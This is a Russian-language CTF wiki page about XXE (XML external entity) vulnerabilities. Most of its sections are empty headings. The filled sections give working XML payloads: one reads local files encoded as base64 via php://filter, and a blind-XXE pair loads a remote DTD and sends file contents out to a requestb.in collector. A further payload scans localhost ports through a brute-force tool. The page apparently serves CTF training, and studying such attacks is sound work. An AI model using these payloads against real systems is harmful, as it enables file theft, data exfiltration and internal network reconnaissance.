Xxe

Содержание

1 Поиск уязвимости
2 Эксплуатация
- 2.1 Чтение локальных файлов
- 2.2 Сканирование портов
3 Примеры тасков
4 Райтапы
5 Утилиты
6 Полезные ссылки

Поиск уязвимости

Эксплуатация

Чтение локальных файлов

Код для чтения лок. файлов, вывод закодирован в base64:

<?xml version='1.0' standalone='yes'?>
<!DOCTYPE plot [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/flag">]>
<root>&xxe;</root>

В случае со слепой XXE:

Отсылаемый код:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://site/xxe.dtd">
%remote;]>
<root/>

Хранящийся по URL'у (http://site/xxe.dtd):

<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/flag">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://requestb.in/xxxxxxxx?xxe_local=%payload;'>">


%int;
%trick;

Сканирование портов

Запускать нужно с Intruder'ом или другой утилитой, позволяющей перебирать значение $$ (1-65535):

<?xml version='1.0' standalone='no'?>
<!DOCTYPE plot [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://127.0.0.1:$$">]>
<root>&xxe;</root>